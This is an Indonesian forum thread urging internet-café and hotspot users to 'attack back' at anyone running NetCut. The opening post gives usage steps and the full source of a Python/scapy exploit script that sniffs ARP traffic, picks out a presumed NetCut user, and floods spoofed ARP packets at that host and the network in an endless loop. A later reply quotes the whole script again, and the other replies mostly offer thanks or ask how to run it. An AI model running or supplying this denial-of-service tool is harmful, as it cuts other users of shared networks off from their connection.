Follow us on...
Follow us on G+ Follow us on Twitter Follow us on Facebook Watch us on YouTube
Register
Results 1 to 8 of 8
  1. #1
    Status
    Offline
    nitaufan's Avatar
    Member
    Join Date
    Apr 2008
    Posts
    154
    Reviews
    Read 0 Reviews
    Downloads
    1
    Uploads
    0
    Feedback Score
    0

    Serang Balik Pengguna Netcut

    Koneksi putus bukan menjadi sebuah dilema lagi, melainkan bisa dikarenakan beberapa sebab. Terutama di hotspot gratisan atau di warnet-warnet, kalau koneksi kita lemot dan tidak bisa akses internet dengan tidak normal, mungkin salah satunya karena ada pengguna warnet lainnya yang menggunakan NETCUT.

    Agar tidak bete karena loading lama, serang balik saja pengguna NETCUT tersebut.

    Langkahnya adalah:

    Harus sudah terdapat python compiler di komputer
    Download toolsnya disini:
    Jalankan tools tersebut dengan compile: python filenameexploit.py [ethernet] [macaddress], contoh: python netcutkiller.py eth0 A1:B2:C3Click here to enlarge4:E5:F6

    Code exploitnya adalah sebagai berikut:
    Code:
    #!/usr/bin/env python
    #Exploit Title: Netcut Denial of Service Vulnerability
    #Author: MaYaSeVeN
    #Greetz: Inj3ct0r 1337day Exploit DataBase (1337day.com)
    #Blog: http://mayaseven.blogspot.com
    #PoC: Video  http://www.youtube.com/user/mayaseven
    #Picture http://3.bp.blogspot.com/-GcwpOXx7ers/TwGVoyj8SmI/AAAAAAAAAxs/wSGL1tKGflc/s1600/a.png
    #Version: Netcut 2
    #Software Link: http://www.mediafire.com/?jiiyq2wcpp41266
    #Tested on: Windows Xp, Windows 7
    #Greetz :  ZeQ3uL, c1ph3r, x-c0d3, p3lo, Retool2, Gen0TypE, Windows98SE, Sumedt, Rocky Sharma
    
    from scapy.all import sniff,Ether,ARP,RandIP,RandMAC,Padding,sendp,conf
    import commands,os,sys
    
    #gw_mac = commands.getoutput("arp -i %s | grep %s" % (conf.iface,conf.iface)).split()[2]
    gw_ip  = commands.getoutput("ip route list | grep default").split()[2]
        
    def protect(gw_ip,gw_mac):
        os.popen("arp -s %s %s" %(gw_ip,gw_mac))
        print "Protected himself"
        
    def detect():
            ans = sniff(filter='arp',timeout=7)
            target=[]
            for r in ans.res:
                target.append(r.sprintf("%ARP.pdst% %ARP.hwsrc% %ARP.psrc%")) 
            return target
    
    def preattack(gw_ip):
        num = []
        count = 0
        target = 0
        temp = 0
        print "Detecting..."
        d = detect()
        for i in range(len(d)):
            if d[i].split()[0] == "255.255.255.255":
                num.append(d.count(d[i])) 
                if d.count(d[i]) > count:
                    count = d.count(d[i])
                    target = i
            if d[i].split()[0] == gw_ip:
                temp += 1       
        if len(d) < 7:
            print "[-] No one use Netcut or try again"
            exit()
        if len(num)*7 < temp:
            num[:] = []
            count = 0
            result = float(temp)/len(d)*100
            for j in range(len(d)):
                if d[i].split()[0] == gw_ip:
                    num.append(d.count(d[j]))
                    if d.count(d[i]) > count:
                        count = d.count(d[i])
                        target = i
                num.reverse()
                result = float(temp)/len(d)*100
            print target 
        else:
            num.reverse()
            result = float(num[0]+temp)/len(d)*100
        
        print "There is a possibility that " + str(result) + "%"
        if result>= 50:
            target_mac = d[target].split()[1]
            target_ip = d[target].split()[2]
            print "[+]Detected, Netcut using by IP %s MAC %s" %(target_ip,target_mac)
            attack(target_mac,target_ip,gw_ip)    
        else:
            print "[-] No one use Netcut or try again"
    
    def attack(target_mac,target_ip,gw_ip):
        print "[+]Counter Attack !!!"
        e = Ether(dst="FF:FF:FF:FF:FF:FF")
        while 1:
            a = ARP(psrc=RandIP(),pdst=RandIP(),hwsrc=RandMAC(),hw  dst=RandMAC(),op=1)
            p = e/a/Padding("\x00"*18)
            sendp(p,verbose=0)
            a1 = ARP(psrc=gw_ip,pdst=target_ip,hwsrc=RandMAC(),hwds  t=target_mac,op=2)
            p1 = e/a1/Padding("\x00"*18)
            sendp(p1,verbose=0)
            
    if __name__ == '__main__':
        os.system("clear")
        print   "##################################################  #"
        print    " __  __    __     __    _____   __      __  _   _"
        print    "|  \/  |   \ \   / /   / ____|  \ \    / / | \ | |"
        print    "| \  / | __ \ \_/ /_ _| (___   __\ \  / /__|  \| |"
        print    "| |\/| |/ _\ \   / _\ |\___ \ / _ \ \/ / _ \ . \ |"
        print    "| |  | | (_| || | (_| |____) |  __/\  /  __/ |\  |"
        print    "|_|  |_|\__,_||_|\__,_|_____/ \___| \/ \___|_| \_|"
        print   " "
        print   "##################################################  #"
        print   ""
        print   "http://mayaseven.blogspot.com"
        print   ""
        if len(sys.argv) == 2 or len(sys.argv) == 3:
            if len(sys.argv) == 2:
                conf.iface=sys.argv[1]
                preattack(gw_ip)
            if len(sys.argv) == 3:
                conf.iface=sys.argv[1]
                gw_mac = sys.argv[2]
                protect(gw_ip,gw_mac)
                preattack(gw_ip)
        else:
            print '''Mode:   
    1.)Attack only
    Usage: NetcutKiller <Interface>
    e.g. NetcutKiller.py wlan0
            
    2.)Attack with protect himself
    Usage: NetcutKiller <Interface> <MAC_Gateway> 
    e.g. NetcutKiller.py wlan0 00:FA:77:AA:BC:AF 
    ''' 
    
    
    # 1337day.com [2012-01-04]
    Untuk lebih detailnya, simak video berikut:



    Oke all, selamat mencoba dan semoga berhasil

    CREDIT BY : BINUS HACKER TEAM ()

  2. The Following 4 Users Say Thank You to nitaufan For This Useful Post:


  3. #2
    Status
    Offline
    yogii's Avatar
    Member Senior
    Join Date
    Jun 2010
    Location
    Batam - Indonesia
    Posts
    416
    Reviews
    Read 0 Reviews
    Downloads
    0
    Uploads
    1
    Feedback Score
    0
    keren gan. terima kasih Click here to enlarge

  4. #3
    Status
    Offline
    wie_chang81's Avatar
    Member
    Join Date
    Sep 2009
    Location
    riau
    Posts
    255
    Reviews
    Read 0 Reviews
    Downloads
    2
    Uploads
    0
    Feedback Score
    0
    nice info.. TQ

  5. #4
    Status
    Offline
    tyang_dusun's Avatar
    Member Super Senior
    Join Date
    Jun 2008
    Location
    Klaten, Jawa Tengah, Indonesia, Indonesia
    Posts
    521
    Reviews
    Read 0 Reviews
    Downloads
    1
    Uploads
    0
    Feedback Score
    0
    yang udah nyoba prikitiuwnya dunk ...

  6. #5
    Status
    Offline
    awanbiru2007's Avatar
    Calon Member
    Join Date
    Jan 2010
    Posts
    73
    Reviews
    Read 0 Reviews
    Downloads
    3
    Uploads
    0
    Feedback Score
    0
    Keren bangen bro, ajib, kalo kita mau run dari windows harus install python dulu ya,???
    Click here to enlargeClick here to enlargeClick here to enlarge

  7. #6
    Status
    Offline
    rerenet's Avatar
    Member
    Join Date
    Feb 2010
    Location
    jaktim
    Posts
    242
    Reviews
    Read 0 Reviews
    Downloads
    0
    Uploads
    0
    Feedback Score
    0
    Aq ra mudeng babar blas... mumet...Click here to enlarge

  8. #7
    Status
    Offline
    sacrosaint's Avatar
    Baru Gabung
    Join Date
    May 2011
    Posts
    4
    Reviews
    Read 0 Reviews
    Downloads
    0
    Uploads
    0
    Feedback Score
    0
    Click here to enlarge Originally Posted by Harus sudah terdapat python compiler di komputer
    Download toolsnya disini: [url
    http://1337day.com/exploits/17338[/url]
    Jalankan tools tersebut dengan compile: python filenameexploit.py [ethernet] [macaddress], contoh: python netcutkiller.py eth0 A1:B2:C34:E5:F6:
    filenameexploit.py [ethernet] [macaddress] <-------- ether dan macaddress siapa yg diisi disini Click here to enlarge

  9. #8
    Status
    Offline
    karaeng's Avatar
    VIP Member
    Join Date
    Jun 2010
    Posts
    958
    Reviews
    Read 0 Reviews
    Downloads
    0
    Uploads
    0
    Feedback Score
    0
    Click here to enlarge Originally Posted by nitaufan Click here to enlarge
    Koneksi putus bukan menjadi sebuah dilema lagi, melainkan bisa dikarenakan beberapa sebab. Terutama di hotspot gratisan atau di warnet-warnet, kalau koneksi kita lemot dan tidak bisa akses internet dengan tidak normal, mungkin salah satunya karena ada pengguna warnet lainnya yang menggunakan NETCUT.

    Agar tidak bete karena loading lama, serang balik saja pengguna NETCUT tersebut.

    Langkahnya adalah:

    Harus sudah terdapat python compiler di komputer
    Download toolsnya disini:
    Jalankan tools tersebut dengan compile: python filenameexploit.py [ethernet] [macaddress], contoh: python netcutkiller.py eth0 A1:B2:C3Click here to enlarge4:E5:F6

    Code exploitnya adalah sebagai berikut:
    Code:
    #!/usr/bin/env python
    #Exploit Title: Netcut Denial of Service Vulnerability
    #Author: MaYaSeVeN
    #Greetz: Inj3ct0r 1337day Exploit DataBase (1337day.com)
    #Blog: http://mayaseven.blogspot.com
    #PoC: Video  http://www.youtube.com/user/mayaseven
    #Picture http://3.bp.blogspot.com/-GcwpOXx7ers/TwGVoyj8SmI/AAAAAAAAAxs/wSGL1tKGflc/s1600/a.png
    #Version: Netcut 2
    #Software Link: http://www.mediafire.com/?jiiyq2wcpp41266
    #Tested on: Windows Xp, Windows 7
    #Greetz :  ZeQ3uL, c1ph3r, x-c0d3, p3lo, Retool2, Gen0TypE, Windows98SE, Sumedt, Rocky Sharma
    
    from scapy.all import sniff,Ether,ARP,RandIP,RandMAC,Padding,sendp,conf
    import commands,os,sys
    
    #gw_mac = commands.getoutput("arp -i %s | grep %s" % (conf.iface,conf.iface)).split()[2]
    gw_ip  = commands.getoutput("ip route list | grep default").split()[2]
        
    def protect(gw_ip,gw_mac):
        os.popen("arp -s %s %s" %(gw_ip,gw_mac))
        print "Protected himself"
        
    def detect():
            ans = sniff(filter='arp',timeout=7)
            target=[]
            for r in ans.res:
                target.append(r.sprintf("%ARP.pdst% %ARP.hwsrc% %ARP.psrc%")) 
            return target
    
    def preattack(gw_ip):
        num = []
        count = 0
        target = 0
        temp = 0
        print "Detecting..."
        d = detect()
        for i in range(len(d)):
            if d[i].split()[0] == "255.255.255.255":
                num.append(d.count(d[i])) 
                if d.count(d[i]) > count:
                    count = d.count(d[i])
                    target = i
            if d[i].split()[0] == gw_ip:
                temp += 1       
        if len(d) < 7:
            print "[-] No one use Netcut or try again"
            exit()
        if len(num)*7 < temp:
            num[:] = []
            count = 0
            result = float(temp)/len(d)*100
            for j in range(len(d)):
                if d[i].split()[0] == gw_ip:
                    num.append(d.count(d[j]))
                    if d.count(d[i]) > count:
                        count = d.count(d[i])
                        target = i
                num.reverse()
                result = float(temp)/len(d)*100
            print target 
        else:
            num.reverse()
            result = float(num[0]+temp)/len(d)*100
        
        print "There is a possibility that " + str(result) + "%"
        if result>= 50:
            target_mac = d[target].split()[1]
            target_ip = d[target].split()[2]
            print "[+]Detected, Netcut using by IP %s MAC %s" %(target_ip,target_mac)
            attack(target_mac,target_ip,gw_ip)    
        else:
            print "[-] No one use Netcut or try again"
    
    def attack(target_mac,target_ip,gw_ip):
        print "[+]Counter Attack !!!"
        e = Ether(dst="FF:FF:FF:FF:FF:FF")
        while 1:
            a = ARP(psrc=RandIP(),pdst=RandIP(),hwsrc=RandMAC(),hw  dst=RandMAC(),op=1)
            p = e/a/Padding("\x00"*18)
            sendp(p,verbose=0)
            a1 = ARP(psrc=gw_ip,pdst=target_ip,hwsrc=RandMAC(),hwds  t=target_mac,op=2)
            p1 = e/a1/Padding("\x00"*18)
            sendp(p1,verbose=0)
            
    if __name__ == '__main__':
        os.system("clear")
        print   "##################################################  #"
        print    " __  __    __     __    _____   __      __  _   _"
        print    "|  \/  |   \ \   / /   / ____|  \ \    / / | \ | |"
        print    "| \  / | __ \ \_/ /_ _| (___   __\ \  / /__|  \| |"
        print    "| |\/| |/ _\ \   / _\ |\___ \ / _ \ \/ / _ \ . \ |"
        print    "| |  | | (_| || | (_| |____) |  __/\  /  __/ |\  |"
        print    "|_|  |_|\__,_||_|\__,_|_____/ \___| \/ \___|_| \_|"
        print   " "
        print   "##################################################  #"
        print   ""
        print   "http://mayaseven.blogspot.com"
        print   ""
        if len(sys.argv) == 2 or len(sys.argv) == 3:
            if len(sys.argv) == 2:
                conf.iface=sys.argv[1]
                preattack(gw_ip)
            if len(sys.argv) == 3:
                conf.iface=sys.argv[1]
                gw_mac = sys.argv[2]
                protect(gw_ip,gw_mac)
                preattack(gw_ip)
        else:
            print '''Mode:   
    1.)Attack only
    Usage: NetcutKiller <Interface>
    e.g. NetcutKiller.py wlan0
            
    2.)Attack with protect himself
    Usage: NetcutKiller <Interface> <MAC_Gateway> 
    e.g. NetcutKiller.py wlan0 00:FA:77:AA:BC:AF 
    ''' 
    
    
    # 1337day.com [2012-01-04]
    Untuk lebih detailnya, simak video berikut:



    Oke all, selamat mencoba dan semoga berhasil

    CREDIT BY : BINUS HACKER TEAM ()

    wuakakka..... mirip perang2an aja...
    tp nice info gan....

 

 

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Similar Threads

  1. firewall blok pengguna netcut
    By unique_leader in forum Firewall
    Replies: 122
    Last Post: 25-07-2012, 08:52
  2. habis dikonekin balik lagi ke STATION...@_@...
    By rarenakal in forum Wireless Networking
    Replies: 0
    Last Post: 05-06-2010, 09:42
  3. [share]nyadar gak fb sekarang balik kaya dulu lage...
    By geonet_comp in forum General Networking
    Replies: 5
    Last Post: 27-02-2010, 21:07
  4. Router kena serang ndak bisa serang balik
    By mikroseek in forum General Networking
    Replies: 1
    Last Post: 29-08-2009, 01:43

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •